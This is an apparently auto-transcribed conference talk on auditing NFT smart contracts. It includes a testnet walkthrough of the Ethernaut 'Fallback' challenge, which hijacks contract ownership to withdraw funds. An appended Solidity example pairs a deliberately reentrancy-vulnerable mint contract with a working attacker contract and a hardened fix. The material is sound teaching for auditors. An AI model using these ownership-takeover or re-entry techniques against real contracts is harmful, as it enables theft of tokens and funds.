
[Music]
stra, or whatever you say, and that was my talk in Bulgarian. Okay, that's the end of my talk in Bulgarian. But yeah, thank you for being here, actually, because I know that a lot of you are really tired at this point, so I'm going to try to make it simple, and even short if I can. I'm going to talk, we're going to talk about how to perform an NFT assessment, and when I talk about how to perform an NFT assessment I'm actually talking about how to perform an NFT smart contract assessment, because everything comes down to working with the smart contract itself. Okay, so that's why my talk is called From Pizza to Profit: Mastering NFT Evaluation Strategies.

So, who am I? I work as a security consultant at NCC Group. I'm part of the blockchain practice; we have a global blockchain practice in NCC Group. Last but not least, this is my badge when it comes to blockchain security, but to be honest, I actually learned more from doing the assessments themselves than from getting the certification. So I came from Spain; it was a long trip, actually. And just a disclaimer before we start with the talk: due to the lack of time, and because we could be talking about NFTs and smart contracts all day, I will try to make it simple, to skip some explanations, but they are still there, you can find them in the slides, and any credit is given. And keep this in mind, because even if I can perform NFT assessments, I am by no means an expert in NFTs. It's like when a pentester can perform an API assessment, but that person might not be an expert on developing an API. So that's the case for me.

Okay, so this is our agenda for today. Probably some of you are really familiar with NFTs, but we're going to talk about what they are, how they work, the common vulnerabilities we can find in a smart contract, in an NFT smart contract. We're going to introduce the methodology, we're going to see some tools, an NFT in real life, and if the time allows us, we are going to interact with an NFT smart contract, with some conclusions at the end. So let me introduce you Andrea Pep, the great blockchain educator, who's going to tell you what NFTs are and what they mean, and
to be able to understand what they are, it's better to compare NFTs to cryptocurrencies, because maybe more people are familiar with cryptocurrencies than they are with NFTs. So we can split the main differences into three topics: ownership, transactions and tradability. When we talk about ownership, you can say that holding cryptocurrencies is like holding money: the coin is entirely owned by the holder, okay. But what is the main difference with NFTs? The owner of the NFT owns the metadata; I mean, probably the owner of the NFT only owns the metadata and everything that is related to the non-fungible token, but it sometimes happens that the intellectual property belongs to the original artist. Why? Because when we talk about NFTs we talk about non-fungible tokens that represent an asset that actually exists; it could be a digital asset and even a physical asset, okay. When we talk about digital assets, they could be images, they could be videos, they could be whatever your imagination allows you to think about.

So what about the transactions? Coins are mined and, on the contrary, NFTs are minted. And what does minting mean in the NFT world? It means converting a file into a token so it's usable on a blockchain. And how do we do that? That's why we use a smart contract, and that's why when performing an NFT assessment we perform that test using their smart contracts, even though it's not just about the smart contract itself; we're going to see some other aspects that we need to take into account when performing an NFT assessment.

So what about the tradability? Cryptocurrencies are fungible because one crypto equals another crypto, but NFTs, I mean one NFT might not be equal to another NFT, okay, because NFTs are non-fungible, that's why the name. They are not equal to another NFT; they're unique, and they represent an asset, a digital asset or a physical asset. That's why we can say that they are unique; it's like an artwork, an artwork won't be equal to another artwork.

So, a history of NFTs. It's fair enough to think that NFTs haven't been with us that long, but on the contrary, they have been around more than 10 years. They started with colored coins, that were a special kind of coins that were unique because they had metadata linked with that coin. It wasn't just whatever coin, it wasn't like Bitcoin, because one Bitcoin is equal to another Bitcoin, but in this case, because they were linked to metadata, colored coins were unique from one to another. That's why we say that it was actually in 2013 when the NFT came to life. But we can talk about two periods when talking about the history of NFTs, and those periods are the pre-ERC-721 standard era and the post-ERC-721 era. Why? Because the ERC-721 standard was actually created to set a guideline on how NFTs should be created, because if we promote a standard that any NFT smart contract follows, we can actually communicate from one smart contract to another. So this standard was made for that; that's why it changed the game, it was a game changer.

So how do they work? We can actually talk about two sides, okay. To get to
understand the whole process of NFTs, we have the service side here and we have the user side here. On the user side we have two roles, or even three roles: we have the NFT owner, that could be the creator as well, because sometimes the creator is not even the NFT owner, we're going to talk about that later on, and we have the NFT buyer. On the service side, that NFT owner or creator, that could be the same person, is the one that needs to make sure that the metadata linked to an NFT is accurate enough; I mean, the creator is the one that is in charge of checking if the token ID, the data, is accurate before submitting that data into the chain, okay, because when it's signed and verified by the NFT owner, it will link that metadata related to the NFT to a smart contract, and this is when the minting process begins, okay. Like we said, the minting process is the creation of this NFT smart contract within the blockchain, okay. This is when the consensus is performed, and if everything is correct, this smart contract is going to be on the chain.

So, two things that are really important when it comes to NFTs and the metadata we talked about: the storage could be internal or external. It could be internal because we can actually have the NFT, or the metadata linked to the NFT, within the chain, but it will be gas consuming, it will be resource consuming. That's why, generally speaking, people usually use external storage to save that metadata, and then within the smart contract there is a URI, a URL, that represents where that metadata is stored. And we are going to talk about what kind of storage we have.

So when it comes to performing an NFT assessment, we need to take into account some properties that NFTs have, and those properties are actually inherited from these three topics. We can split them into the properties provided by the smart contract itself, because when talking about NFTs we're talking about a smart contract; the properties that are provided by the blockchain itself, just for being in a blockchain, we talk about some properties that the NFT is going to take from it; and of course, because at the end of the day NFTs are created by a person, and sometimes they are maintained by a person as well, we talk about those properties that human management provides. So when getting to understand this kind of properties, when performing an NFT assessment, we can also ask: what are the security concerns regarding this kind of properties? What about the NFT being owned by someone? I mean, NFTs designate ownership by recording a blockchain address. What happens if that address is changed, if someone is able to change that address, what happens? So here these properties will give us an idea of what we should ask, even the client, to be able to understand how they deploy or where they deploy their NFT, and what are the security concerns from this kind of property. So these are actually the security concerns that are linked to those properties, and as I said, one of the attributes of an NFT is that the NFT is owned by someone. What happens if that account is compromised and the asset is transferred by malicious actors? What happens if, for example, another one, NFTs are transferable as well, what happens if the smart contract lacks mechanisms for token restoration? If we are not able to restore the NFT if an attack happens, we're going to lose that NFT. So that's why this kind of properties and questions are security concerns that we need to ask, or we need to try to answer.

So what about NFT security risks in general? Because, as I said, it's about smart contracts, of course, that's why any vulnerability related to a smart contract will potentially impact an NFT. But because with NFTs we can use
marketplaces to sell our NFTs, if we are using a third-party marketplace we have another attack vector added to the situation, and that's why any marketplace risk matters; for example OpenSea, that is one of the well-known marketplaces for NFTs, was hacked last year and there were millions of NFTs compromised. So that's why the marketplace that a client or customer is using for their NFTs is really important. And of course, because at the end of the day we have the human factor here, anything related to social engineering to steal private keys will be another security risk. And the rug pulls; what are the rug pulls? The rug pulls are scams, those kinds of projects that came to life and went mainstream, and everybody was putting money in there, trying to create NFTs, trying to sell or buy NFTs from there, and then one day they disappear. And it happens a lot. I mean, even though I wouldn't put money in an NFT, to be honest, there are people putting money in NFTs, and they even use rug pulls, that kind of marketplaces that are scams, that are well known, that they don't know about their security. So those are the main problems when it comes to NFTs.

And what about the methodology? When performing an NFT assessment we need to take into account three aspects, and those are the network, the data management and the data storage. And sorry about that, where are we... okay, here, yeah, okay. So I was talking about: we need to take into account network, data management and data storage. So why the network? Because when a customer asks us to perform an NFT assessment and they tell us that they aren't following one of the well-known standards for non-fungible tokens, that's actually an issue; the first issue you can find in an NFT assessment, because the best practice is to actually use one of these standards. The ERC-20 is just used for fungible tokens, for any coins, for example cryptocurrencies, and the ERC-721 is
used for NFTs in this case, and there is another one that can be used for both kinds of tokens, fungible and non-fungible. So that's why it is important to check if they are following the best practice regarding this kind of standard.

And what about the data management, why is it important in this case? It is important where we save the metadata of that NFT. The metadata is actually the description of what the NFT is, where the asset, the digital asset, is stored, or where, probably, it contains a physical address of where the physical NFT is, for example. So that's why it is important to get to know where that metadata is stored, because, we're going to talk about where it can be stored, but if it's stored in a third party, we actually have another attack vector here. So that's why it's really important what kind of contract they are using, and what is the marketplace they are using. And that's why we're going to see one tool that comes in handy whenever performing an NFT assessment, that is a linter, because we can kind of check if they're following the best practice for the standard they're using. So with this command we can actually check if they are following that.

And another thing in this phase that we need to take into account: what we actually do in an NFT assessment is a code review; that's actually the main part, it's not the only thing that we do, but it is the main part of everything, we perform a code review. That's why when we have some functions like safeTransferFrom or safeMint, and they are performing external calls to the receiver, we can actually say at this point that that's not a recommended way to do it, and that's why we check for reentrancy vulnerabilities. And what is a reentrancy vulnerability? It is when a smart contract can be called by another smart contract before it has actually completed its state; when there is a process in the smart contract that they need to complete, for example the mint process, and they are called by another smart contract before getting to complete that process, we can talk about a reentrancy vulnerability. And even though they are really well known, they are quite common. You will say, I mean, I can't tell you names, but even big companies fall into that kind of vulnerability.

So what about the data storage, and why is it important? Because normally, as I said, storing the NFT on the chain is gas consuming, it is resource consuming. Generally speaking, NFT projects always play safe with how they store the data as well, and that's why we need to know what kind of storage method they are using, in order to know if they're using a good one, a safe one, and what kind of method they're using for that. So, as I said, the smart contract provides that URI, URL, for each token. So what are the most common ways to store NFTs? We have software wallets, like MetaMask for example; we can have NFTs on MetaMask. We have IPFS, like Pinata; I'm going to show you one of my NFTs in Pinata. This is kind of a peer-to-peer system where you can share data, and it represents like a library, okay. And we have as well cold storage, hardware wallets. They are not that common in big companies; I really enjoy performing assessments of this kind of hardware wallet.

So what about the tools for code review analysis? Because at the end of the day, that's what we actually do, we perform a code review. So this is a list; these are not all the tools that we can use, but this is a really good list of the tools that we normally use when performing an NFT
assessment. But bear with me on this, because, recommendation-wise in this case, whenever you ask the client to share with you a smart contract, they share with you which kind of framework they used to develop that smart contract, and they should share with you the unit tests as well. So the better way to perform an assessment of this kind of smart contract is to test the smart contract locally. Why? Because if you use Foundry, for example, which is a development framework, you can use a local node, like with Anvil, so you are not going to need currency, you are not going to need coins, you are not going to need ether or whatever coins that you would probably need to interact with an NFT. Of course, the best scenario is that the customer actually gives you access to their test environment, but that doesn't happen a lot, unfortunately. So this is a good list, because you can ask yourself, okay, but if this is a code review, and we are talking about, for example, most of the smart contracts being made in Solidity, so what are the weaknesses of those smart contracts? These people, those that were in charge of this project, listed a very detailed smart contract weakness classification. They are no longer updated; they even tell you where you should get the latest of this kind of data, of information, but still they have a really good list of weaknesses related to smart contracts. And this one here, sorry, this one here actually gives you an idea of the security checks you can perform when doing a code review of a smart contract.

So here we have the NFT in real life. This is my NFT; you can even buy it if you want, that would be funny for me actually, or you can try to steal my NFT as well, that could be. So we're going to see this NFT in real life. Let me... So this is the NFT on OpenSea, on the testnet; the testnet is one of their test platforms, okay. And what is interesting about this NFT, what is interesting about how it is represented here in OpenSea, is that we can get to know where the metadata of this NFT is stored. And that's why I was talking to you about that: the metadata could be within the chain, but it would consume a lot of gas, and that's why I actually use IPFS, okay, which is Pinata here, to store the metadata related to that NFT. And what does the metadata actually have? The metadata includes the description and where that image is stored. And where is that image stored? That image is actually in Pinata, which is the platform that you can use to store metadata related to digital assets. So this is where it is stored,
and another interesting thing about searching for some NFTs in this kind of platform is that you have the contract address, the NFT smart contract of this NFT linked to my photo. And because blockchain is actually something that you can check, you can see all the history of the transactions that have been performed. You can actually, because I decided it that way, see the source code of this smart contract for this NFT. That's why I was telling you that you can actually try to perform an attack, to be able to actually steal my NFT, or, the better way to do it is to buy my NFT as well. So the good part, the interesting part of this kind of platform, is that when someone shares the code, because you can actually share the code or you can't decode it, when someone shares the code you can actually see what are the functions that you can call from this smart contract, and that's why you can actually test this kind of platform just to get to know what the code does and what are the functions that I can call, and even perform some input validation, just in case something was made wrong. So this is why we have here another tool. I just want to share with you that we actually have an NFT in real life; this smart contract is deployed on Polygonscan. It could be deployed on Ethereum, but I just chose this one because I use fake coins as well.

But here, I'm going to share, you're going to share the presentation later on, right? I'm going to share with you this presentation, because here you have some CTFs that really come in handy whenever you want to understand how smart contracts work. So here you have Ethernaut, from OpenZeppelin, this one is quite interesting, and of course we have Damn Vulnerable DeFi as well. And whenever performing an NFT assessment, the final result of this process is actually a report for the customer, okay, and that's why, sometimes, when you are getting started with NFTs, you will probably have a hard time identifying what kind of issues or findings we can find in this kind of assessment. So that's why I share with you all these examples, some reports that were published by OpenZeppelin, that will give you an idea of how a report of a smart contract will look like.

So, because I don't know how... oh, we have time. We're going to try to interact with an NFT. This is actually, I mean, I kept it simple because I gave you all these details for you to be able to try to deploy an NFT yourself, using of course fake coins, you know, MATIC, that is a fake coin you can use on the Mumbai testnet, that is actually a platform that you can use for testing purposes. So that's why I gave you this kind of data that you can use to try to deploy an NFT yourself. But we are going to see what about the CTF; I mean, we're going to try to interact with a smart
contract, try to use it, and see what is happening with this fallback function, okay. So we have Ethernaut, that was one of the platforms that I shared with you, that has a really interesting CTF. So this is actually a challenge that we need to perform in order to be able to steal this smart contract and be able to withdraw their funds, okay. So I'm going to try to open a new instance and they will ask... That's why I have MetaMask; I don't know if you are aware, if you are familiar with MetaMask. MetaMask is a wallet, and I actually have just fake coins, okay, but I have the Sepolia ETH, that is a fake coin, and in order to get a new instance they will ask you to do the transaction, because you will need some gas to perform it. So let's see if we can get... This is, when getting a new instance, this is the contract address when we get that new instance. So this is the contract address that we're going to use in this example.

So, Remix; I'm using Remix because everything, I don't know why, it doesn't look like you are able to see it well, more or less. So, in the slides I put some information about Remix, but this is actually a testing, a development tool. So we're going to use Remix. What we're going to do: this is the smart contract, this is the smart contract from here, okay, this is the code we're using from this smart contract. So, in order to test it using Remix, which is a test tool, we need to compile that smart contract, and in order to compile that smart contract we need to... this could be an issue if a customer actually shares with us this kind of smart contract and they are using a Solidity version that is old enough; this is actually an issue, okay, this is actually a finding, because this is the kind of thing that we need to check within the code. So we need to use the compiler, the same compiler, and we need to deploy this smart contract; it should be deployed here.

And in order to understand what the smart contract is doing, this is actually, I mean, the challenge is called Fallback, and why is it called Fallback? Because a fallback function is a best practice when you want your smart contract to receive ETH from another smart contract, but you can do it in a safe way or you can do it in the worst way possible, and I'm going to show you that this is actually the worst way possible, because you can do it in a simple way or you can actually add, in the fallback function, functions that allow you to change the owner of a smart contract. And that's why, what we are going to try to do, I mean, the owner of this smart contract is actually this contract address, okay, which is where we deployed the new instance, okay. So that's why, when we're performing a test within a smart contract, within the challenge, we need to make sure that we are using the same wallet, which in this case is MetaMask. This is actually my account, this is actually my account from MetaMask; you can see it here, it's a bit slow, but trust me, it is my account, so here you can see it, okay.

So what we're going to do: we need to understand where in the code they are calling owner, or where in the code they're actually trying to change the owner of this smart contract. And we have a lot of functions here, but mainly they are actually trying to change the owner in two functions: contribute is where we see that the owner is changed, and receive is where we see the owner changed. So I'm going to try to deploy this smart contract at this address. It will ask for gas; that's why I was saying that when you are testing this kind of environment you should have fake money. And you can see, when this NFT, this smart contract, is deployed, you can see here that we have the functions that are being called or that are included in the smart contract, in the call, okay. So, if you see, we have the contribute function, we have getContribution as well, we have withdraw, but what about receive? Can we call receive from within Remix? We can call receive, and what happens whenever we don't have a way to call a function or to call a
class? We can use, in Remix, this calldata, this Transact, that will be calling whatever function or whatever class is contained within the function that we should be able to call. So what we are going to do, yeah, it's calling... What we're going to do is try... What this function that we are going to try to call from outside, using this calldata, is actually saying is something like: okay, in order to be the owner of this smart contract you should have given us a contribution, and you should somehow, in the past, have interacted with this smart contract. And that's why, that's what we're going to do: we contribute, because we can call contribute from outside, I mean from within the functions, in Remix. We're going to try to send some wei; this is another kind of unit, I mean it could be ETH but we're going to use wei, this is another kind of fake coin. And we're going to call contribute, and we need to confirm the transaction. Let's see, it is worth... transaction pending, it says. Okay, transaction confirmed. Let's see, this is actually the problem with the live demo, but we get there. Let's see if we can actually contribute, because if we are able to contribute with money, we are able to match one of the conditions that the receive function has, okay. So let's see if it changed in some part; this balance should be changed for whatever wei we were sending, okay. But trust me... oh, let's see, let's perform another amount.

Oh, okay, see, it changed, okay. So we were able to contribute some money, so in that case we were able in the past to actually interact with this smart contract, so in that case we should be able to be the new owner of this smart contract, so whenever we want to send the money we should be able to be the owners. So, anyway, once we were able to send some money, to contribute some money, we were able to match one of the conditions from the receive function, and in this case it should happen that we... let's see what this address is. It's mine, it's my address from MetaMask, let's see. So that's why I'm the new owner of this smart contract. And the last but not least important condition, or the main goal for this example, was to get to withdraw this amount of ETH. And to get to withdraw this amount of ETH... gas estimation failed, of course we will fail, but we try again. And because we don't actually have... we are using the fallback function, which is calling a function that doesn't exist, or using some money that it isn't expecting, that is how we kind of steal, or we are going to try to steal, or to withdraw, this amount of money. Let's see if it lets me withdraw the balance of the funds that this smart contract has. If not, you can trust me, you can try, but we were able to contribute with some money, we were able to be the new owner of this smart contract, and the last but not least thing that we should be able to do, whenever this wants to work, is to actually withdraw that amount of money from the smart contract. But for whatever reason it isn't working right now, but trust me, I mean, you can actually do it. So, getting back to our
presentation. So, that's why you will actually have this CTF, Fallback, here, and you will have as well the smart contract deployed in Remix, so you can try whenever you want, because it is actually a smart way to get to know or to get to interact with NFTs as well.

So some of the conclusions from this presentation: actually, I mean, the big problem with NFTs, apart from being a scam, okay, apart from the fact that they could be a scam, is that you would be impressed by the amount of companies that actually are using NFTs, and they are looking for people that are able to actually perform assessments of NFTs. So, because NFTs at the end of the day are actually smart contracts, whatever vulnerability is linked with a smart contract will potentially affect or impact NFTs as well, and of course social engineering as well. So that's why smart contract auditors are crucial in safeguarding NFTs. That's why, even though NFTs went down last year, there are a lot of companies that are still using NFTs, for games for example, NBA for example. So they're actually looking for people that are able to perform this kind of assessment.

So, last but not least, many thanks for having me, for accepting my proposal, and I want to give a big applause to everyone in charge of the organization of this event, because without you we wouldn't be here. So please, any questions? Give an applause to [Applause] everyone. Thank you, and thank you...
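The reentrancy pattern the speaker describes for safeMint / safeTransferFrom (an external call to the receiver before the contract has finished updating its own state), as an added Solidity example that is not part of the talk, the Ethernaut challenge, or the speaker's code. Everything here is assumed for the illustration: the contract names, the one-token-per-address mint cap, the minimal receiver hook (only the ERC-721 onERC721Received selector is taken from the standard) and the attacker contract. The vulnerable mint sits beside the hardened one so the difference in ordering is visible.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Receiver hook from ERC-721: a safeMint/safeTransferFrom calls this when the
// recipient is a contract and checks the returned selector.
interface IERC721Receiver {
    function onERC721Received(address operator, address from, uint256 tokenId, bytes calldata data)
        external returns (bytes4);
}

// Surface the attacker needs (assumed names, shared by both mints below).
interface IMint {
    function safeMint() external;
    function nextId() external view returns (uint256);
    function minted(address) external view returns (uint256);
}

// Minimal shared "NFT" state; illustrative only, not a full ERC-721.
abstract contract MintBase {
    uint256 public constant MAX_PER_ADDRESS = 1; // assumed per-wallet cap
    uint256 public nextId;
    mapping(uint256 => address) public ownerOf;
    mapping(address => uint256) public minted;

    // The external call: if `to` is a contract, control is handed to it here.
    function _checkOnERC721Received(address to, uint256 id) internal {
        if (to.code.length > 0) {
            bytes4 ret = IERC721Receiver(to).onERC721Received(msg.sender, address(0), id, "");
            require(ret == IERC721Receiver.onERC721Received.selector, "bad receiver");
        }
    }
}

// VULNERABLE: the receiver callback runs before `minted` is updated, so a
// contract recipient can re-enter safeMint() and the cap check passes every time.
contract VulnerableMint is MintBase {
    function safeMint() external {
        require(minted[msg.sender] < MAX_PER_ADDRESS, "cap reached"); // check
        uint256 id = nextId++;
        ownerOf[id] = msg.sender;
        _checkOnERC721Received(msg.sender, id);                        // interaction
        minted[msg.sender] += 1;                                       // effect, too late
    }
}

// HARDENED: checks-effects-interactions (all state written before the external
// call) plus a reentrancy guard as defence in depth.
contract HardenedMint is MintBase {
    uint256 private _lock = 1;

    modifier nonReentrant() {
        require(_lock == 1, "reentrant call");
        _lock = 2;
        _;
        _lock = 1;
    }

    function safeMint() external nonReentrant {
        require(minted[msg.sender] < MAX_PER_ADDRESS, "cap reached"); // check
        uint256 id = nextId++;
        ownerOf[id] = msg.sender;
        minted[msg.sender] += 1;                                       // effect
        _checkOnERC721Received(msg.sender, id);                        // interaction
    }
}

// Attacker (assumed): re-enters safeMint() from the callback until `wanted`
// tokens exist. Against VulnerableMint the nested calls all pass the cap check
// because minted[this] is still 0 during nesting; against HardenedMint the first
// nested call reverts with "reentrant call" (and would hit "cap reached" anyway),
// which reverts the whole transaction.
contract Attacker is IERC721Receiver {
    IMint public immutable target;
    uint256 public wanted;

    constructor(address t) { target = IMint(t); }

    function attack(uint256 n) external {
        wanted = n;
        target.safeMint();
    }

    function onERC721Received(address, address, uint256, bytes calldata)
        external override returns (bytes4)
    {
        if (target.nextId() < wanted) {
            target.safeMint(); // re-entry point
        }
        return IERC721Receiver.onERC721Received.selector;
    }

    // After attack(n) on VulnerableMint this returns n, not the cap of 1.
    function held() external view returns (uint256) {
        return target.minted(address(this));
    }
}
```

To reproduce in Remix or a Foundry test: deploy VulnerableMint, deploy Attacker with its address, call attack(5) and then held(); the attacker holds five tokens under a cap of one. Repeat with HardenedMint and attack(5) reverts. The fix that matters is the ordering of `minted[msg.sender] += 1` relative to the receiver call; the guard only catches what a mis-ordered write would otherwise let through.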